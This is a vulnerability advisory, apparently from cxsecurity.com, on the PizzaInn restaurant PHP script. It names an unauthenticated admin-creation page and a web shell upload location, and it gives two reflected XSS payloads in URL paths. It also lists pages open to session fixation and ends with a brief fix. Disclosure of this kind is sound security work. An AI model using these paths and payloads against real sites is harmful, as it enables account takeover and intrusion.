Restaurant Script (PizzaInn_Project) Add Admin Vulnerability

2018.02.07
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: RSv1.0.0

================================================================================ | # Title : Restaurant Script (PizzaInn_Project) Add Admin Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : RSv1.0.0 | # Tested on: windows 8.1 Français V.(Pro) | # Bug : Add Admin | # Download : sourceforge.net/projects/restaurantmis/files/RSv1.0.0.zip/download ================================================================================== add admin : http://localhost/food/install/administration.php you can add fod and upload shell find her http://localhost/3/images/oo.php XSS : /food/foodzone.php/%22onmouseover%3d'prompt(901513)'bad%3d%22> /food/specialdeals.php/%22onmouseover%3d'prompt(938323)'bad%3d%22> Session fixation : Affected items /admin/index.php /contactus.php /member-index.php /register-exec.php The impact of this vulnerability An attacker can fixate (set) victim's session identifier. How to fix this vulnerability Web applications must ignore any session ID provided by the user's browser at login and must always generate a new session to which the user will log in if successfully authenticated. Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top